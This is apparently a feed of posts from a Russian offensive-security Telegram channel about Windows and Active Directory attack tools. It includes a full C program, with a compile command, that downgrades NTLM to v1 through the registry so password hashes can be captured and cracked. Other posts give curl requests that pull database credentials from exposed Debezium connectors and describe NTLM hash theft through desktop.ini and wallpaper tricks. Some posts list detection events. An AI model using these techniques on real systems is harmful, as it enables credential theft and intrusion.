true_security

С наступающим новым годом. Работы было много, времени для постов мало, извините:)
Будьте здоровы и счастливы. 🍾🍾🍾

В этом посте кратко познакомимся с инструментом atexec-pro (https://github.com/Ridter/atexec-pro). Позволяет выполнять команды (в том числе powershell), загружать-скачивать файлы и выполнять .NET в памяти. Для последних трех ограничение в размере - 1 МБ.

Atexec-pro под капотом использует сервис TSCH против привычного ATSVC и работает через TCP (т.е. пайпы не используем). На мой взгляд примечательно то, что в своей работе он файловую систему практически не трогает (кроме создания самой таски), но при этом позволяет получать нам вывод. Обычно подобные инструменты для этих целей используют промежуточный файл на диске, который затем удаляют (atexec, smbexec, wmiexec). AtExec-pro же для хранения вывода команды использует описание задачи :)

Давайте разберем принцип выполнения отдельной произвольной команды в этом инструменте:
1) Формируются рандомное имя задачи (состоит из 8 символов [A-Za-z]) и рандомный ключ
2) Команда, которую мы хотим исполнить шифруется этим ключом (AES) и в дальнейшем будет записана в описание задачи, думаю этим и вызван максимальный размер.
3) Далее берется шаблон PS скрипта, в нём мы указываем ключ из шага 1, который предварительно конвертировали в base64, и указываем имя задачи. В случае обычной команды это будет https://github.com/Ridter/atexec-pro/blob/main/libs/powershells/cmd.ps1. Сам скрипт по имени задачи дергает описание, расшифровывает его, выполняет команду и далее обновляет описание с выводом этой команды.
4) Далее полученный PS скрипт переводим в base64. Этот скрипт будем выполнять в самой задаче при выполнении через powershell -enc.
5) Создаём задачу и запускаем её.
6) Далее в цикле дергаем задачу, ждём её остановки и забираем результат.
7) Удаляем задачу.

Что в итоге имеем на хосте?

Событие 4698 на создание задачи (будет в Action команда powershell.exe -NonInteractive -enc <...>)
События 4688 на запуск процесса
Событие 4104 на выполнение скрипта powershell
Событие 4702 на обновление задачи после выполнения команды (запись вывода)
Событие 4699 на удаление задачи

Наибольшую ценность в плане детекта имеют события 4698 и 4104.
4698 содержит описание созданной задачи, в ней мы можем зацепиться за фиксированное для atexec и atexec-pro строку <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> в поле TaskContent.
4104 в данном случае будет содержать переведенную из Base64 строку (то есть не обфусцированную), именно в ней можно увидеть ранее рассмотренный выше шаблон с заполненными полями. 4104 включается через Script Block Logging, если явно он не включен, то будет логироваться через AMSI (будет логировать только подозрительные на своё усмотрение в журнал Powershell/Operational). На основе этого события можно надергать ключевых элементов для детекта из поля script_block_text.

Если у вас используются RPC-фильтры, то действуем аналогично SCShell (https://t.me/beaverdreamer/169), в данном случае у сервиса UUID 86D35949-83C9-4044-B424-DB363231FD0C.


#rpc #atexec #schtasks

Конкурс закончен, Artur Lukianov отпишите в личку.
Кто то присылал все что можно было получить через chatgpt, не проверяя что шлет....

листая старенький айпад наткнулся я на цены flipper zero.
Честно сказать, я слегка удивился стоимости 30к за этот девайс.
Вспомнилось мне, что без дела и абсолютно не интересный мне флиппер лежит в шкафу.
Собственно вот, отдам флиппер (чуть чуть поцарапался пластик над экраном) в хорошие руки с пересылкой по РФ тому кто назовёт максимальное количество рабочих утилит и сервисов для туннелинга (ngrok, zrok, chisel и тд).
Писать в бота @flipper_zer0_bot
форматом:
название - линк

итоги подведу 18 ноября. 😜

P.S. не нужно отправлять результаты работы нейронок))) еще и с нерабочими линками

😄Ловите новый гайд по закреплению на IIS-серверах через PSWA (PowerShell Web Access).

Как злоупотребить легитимным функционалом и превратить его в свою точку опоры.
Примеры команд, коротко и по делу.


Подписывайся на @ad_poheque, чтобы быть в курсе актуальных методов взлома! 👾

👾 ЖМИ СПЕЙСИНВЕЙДЕРА 👾

жизная жиза

#meme

неплохой такой weakpass3 )) .....а не пароль

Всем привет, в связи с тем что последнее время приходится часто пентестить FreeIPA мы начали разрабатывать либу по типу impacket заточенную под особенности ипы. Пока начали реализовывать kerberos и написали пок для CVE-2024-3183. Если у кого-то будет желание как-то помочь в разработке - welcome.

https://github.com/c2micro/ipapocket

Всем привет) давно хотел начать вести в паблике какой-нибудь проект, и вот решил сейчас модно писать публичный С2. Идей много, что из этого получится, пока не знаю... может так ничего и не выйдет, а вдруг будет (надеюсь) как с Empire - его кто-то начнет дописывать.

Так как софт будет публичный, а я не особо программист, то буду рад помощи не только в рефакторинге кодовой базы, написании модулей, расширений, но и к идеям для улучшений. Например, дизайн, алгоритмы, поиск багов, да и просто указать на востребованность какого-то функционала.

Теперь обращаюсь к тем, кто хочет поучаствовать, а также кому просто интересно следить за проектом. Вот канал и группа(по ссылке)... Спама на канале будет много: размышления, опросы и т.п.

👀 0-day в «1С», или Как устроен протокол обмена в главной российской ERP-системе

Начинаем знакомить вас с докладами предстоящей конференции. 

Начнем с выступления Алисы Белоусовой — её доклад посвящен простому способу аудита протокола обмена данным в «1С» на реальных примерах.

Алиса расскажет об уязвимых функциях на серверной стороне, приведет типы уязвимостей на клиентской стороне, а также продемонстрирует уязвимости веб-интерфейса.

Кроме того, вы узнаете, как противодействовать угрозам и повысить безопасность разработки в «1С». 

Спикер: Алиса Белоусова, производственный кооператив «Рапид Эссессмент Деливери Кооперейтив» (ПК «РАД КОП»). 

Сложность: medium. 

Когда: 23 августа, 10:00–11:00. 

Где: Main track. 

Если у нас есть права локального администратора... и мы хотим ntlm доменного пользователя который зайдет в интерактиве..
то можно упороться в его автозагрузку с вызовом smb соединения к нашему серверу, либо создать у него на рабочем столе папку с desktop.ini, который будет грузить иконку с нашего SMB сервера. Короче вариантов украсть сессию/хэш на обмазанном антивирусами и edrами устройстве очень много.
А с вариантом выше, оно становится еще и интереснее, ибо можем получить в конечном итоге ntlm хэш пользователя.
как напоминание: https://github.com/Gl3bGl4z/All_NTLM_leak

Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.

#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep

void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
    HKEY hKey;
    DWORD value;
    DWORD valueSize = sizeof(DWORD);

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
        RegCloseKey(hKey);
        *oldValue = value;
    } else {
        printf("Ошибка чтения ключа реестра.\n");
    }
}

void SetRegKey(const char* path, const char* key, DWORD newValue) {
    HKEY hKey;

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
        RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
        RegCloseKey(hKey);
    } else {
        printf("Ошибка записи ключа реестра.\n");
    }
}

void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}

void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}

int main() {
    DWORD oldValue_LMCompatibilityLevel = 0;
    DWORD oldValue_NtlmMinClientSec = 0;
    DWORD oldValue_RestrictSendingNTLMTraffic = 0;

    ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);

    // Задержка 60 секунд
    sleep(60);

    NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);

    return 0;
}

Компилируем так

x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c

В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.

👀 Недавно на одном из проектов мы наткнулись на интересную находку - файл конфигурации Debezium Mysql коннекторов.

Debezium — это сервис для захвата изменений в базах данных и отправки их на обработку в другие системы.

Было обнаружено, что при обращении по URL http://ip:8083/connectors/, можно получить информацию обо всех запущенных и подключенных Debezium Mysql коннекторах, то есть получить полную их конфигурацию с явками и паролями пользователей от БД.

✍🏻 Как найти коннекторы в инфраструктуре и вытянуть информацию об их конфигурации?

Стандартный порт для коннекторов - 8083. Перебором директорий можно найти тот самый файл “connectors”, в котором содержится список всех рабочих коннекторов.

Далее можно обратиться по конкретному имени коннектора и получить его конфигурацию.

Запрос на получение всех коннекторов:

curl http://ip:8083/connectors/ | jq "."

Для получения конфига необходимо обратиться к конкретному коннектору, указав его имя:

curl http://ip:8083/connectors/name | jq "."

Полученную информацию можно использовать для подключения к базе данных 😎

Всем привет! В продолжение темы про NetNTLM-хешики, кражу сессий и эксплойты :))

Тут на днях вышел FakePotato, который пофиксил один супер интересный вектор повышения привилегий - через установку обоев.

Ранее у ncc group выходила крутая статья про то, как изменение обоев может привести к утечке NetNTLM-хеша. Там было достаточно много требований, ограничивающих атаку: Webdav Redirector, DNS-запись....

Однако decoder.cloud достаточно прозрачно намекнул, что нашел функционал, позволяющий изменить обои привилегированного пользователя с использованием специального COM-объекта.

"I played with the Desktop Wallpaper and was able to change the desktop background image of Adminstrator"

Поэтому приходится вскрывать карты :)

Я выложил инструмент LeakedWallpaper , который позволяет получить NetNTLM-хеши ЛЮБОГО пользователя, чья сессия присутствует на хосте. Требования по правам: любые.

Способ до установки июньского фикса KB5040434 будет работать безотказно.

Демо можно найти тут

А я мля... говорил🙈 ушатали аванпост в хвост и гриву

Давно хотел написать, но чет забывал.
Уважаемые вендоры поибэ моей прекрасной Родины, я не раз отдавал вам rce в ваших инфраструктурах, данные клиентов, бывало даже дампы доменов. Время идёт, опыт показывает, что мало что меняется. Займитесь уже наконец-то внутренней безопасностью, у вас есть крутые кадры, только почему-то пентест вы своими силами своей же инфраструктуры не можете сделать. Весь рынок вы учите как строить иб, но у себя вы его так же почему то построить не можете. И т.д.

При всем уважении, этому уже много лет... Джеты зачем же так. Не обязательно vm, просто нужно быть ..... чтобы оставить скрипт восстановления в корне..я так лился лет 5 назад, коллеги не дадут соврать, оно есть в словарях для фазинга веба.. https://jetcsirt.su/bulletins-page/kritichnaya-uyazvimost-v-1c-bitriks-virtualnaya-mashina-vmbitrix-/

Всем доброго вторника! Помните, друзья, как круто было, когда вышел KrbRelay , a за ним KrbrelayUp? Казалось, что в тот день эксплуатация AD перевернулась с ног на голову. Или с головы на ноги.... :)) Не суть!)

Недавно я выкладывал статью, в которой постарался максимально просто описать процесс ретрансляции керберос аутентификации. Но ещё раньше появились интересные атаки: CertifiedDCOM и SilverPotato . Была лишь одна проблема - нет POCов. А что делают студенты, когда нет POCов? Правильно! Их пишут :))

Поэтому хочу вам с радостью представить тулзу RemoteKrbRelay, которая не просто совмещает в себе и SilverPotato и CertifiedDCOM, а является полноценным фреймворком для обнаружения уязвимых DCOM-обьектов!

Я добавил чекер, который выводит абсолютно всю информацию о DCOM-объектах системы в удобно читаемом виде (csv / xlsx). Помимо этого, присутствует встроенный функционал кросс-сессионной активации.

Представляете? Есть два компьютера. На одном вы, а на втором ДА. И вы можете со своего компьютера триггерить керберос аутентификацию ДА, абсолютно удаленно!) 🙂

Что ж, отмечу, что это лишь minimal POC и ему ещё есть куда расти :) Например, я пока не допилил функционал по релею керберос аутентификации из OXID Initial Resolution Request (а там вообще-то RPC_C_IMP_LEVEL_IMPERSONATE🤫). Впрочем, я готов принимать PR :))

Veeam красавцы, один jwt secret на всех. И это они заботятся о сохранности наших данных:)))
Техническое описание: https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/

Сидел вчера я значит вечером и почему то решил сдать crte. Как полагается, я не готовился, не открывал лабы и не читал книгу.
Я уже как то раз так сдавал oscp, было весело.

На экзамен ушло около 10 часов.
Для тех кто перед выбором курса/экзамена: после сдачи osep кажется детской шалостью. Материал в osep,crto,crte примерно одного наполнения. Если выбирать из этих трех, советую osep.
1) Osep - web, Linux, Microsoft ad, bypass av, mssql, чуть чуть кубера + только бесплатные с2
2) Crto - Microsoft ad, mssql, bypass av + только кобальт
3) Crte - Microsoft ad, mssql, bypass av + только бесплатные с2

Печально что нет ничего по контейнерам и другим субд. Ну для контейнеров поиграть можно на стендах standoff365.

CVE-2024-26229 Windows LPE (PoC)

Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code in the csc.sys driver

⌨️ Обход WAF через большое количество символов

Ранее я уже рассказывал о том, что для HTTP-запросов, содержащих тело запроса (например, POST, PUT, PATCH и т.д.), часто можно обойти WAF, просто добавив мусорные данные в начало запроса. Когда запрос дополняется этими ненужными данными, WAF обработает до X КБ запроса и проанализирует его, но все, что превышает пределы WAF, пройдет мимо.

На недавнем NahamCon вышел целый доклад на эту тему с подробным разбором и необходимыми значениями X КБ для обхода различных популярных WAF. Видео доклада, описание и расширение для вставки мусорных данных в Burp представлено по ссылкам ниже.

Ссылка на видео
Ссылка на GitHub

#web #waf #bypass

На этой неделе по некоторым телеграм каналам расходился инструмент EDRaser , судя по описанию: "EDRaser - это мощный инструмент для удаленного удаления журналов доступа, журналов событий Windows, баз данных и других файлов на удаленных компьютерах. Он предлагает два режима работы: автоматический и ручной."
По факту это
- флудер http запросов со сменой useragent
- флудер сообщений по syslog (хотя там гордо написано "Deletes syslog from Linux machines running Kaspersky EDR without being.")
- не понятно что делает с виндовыми логами, особо улыбнула строка: INVOKE_MIMIKATZ_STR = base64.b64decode("QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA==").decode() где в base64 засунули команду: "Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect" и полное отсутствие аутентификации.
ну и т.д.
Короче, очередной fake tools ) не тратьте на него свое время.

CVE-2024-4956 - Unauthenticated Path Traversal in Nexus Repository Manager 3
Работает…проверено…

https://github.com/gmh5225/CVE-2024-4956

Так сказать, свой standoff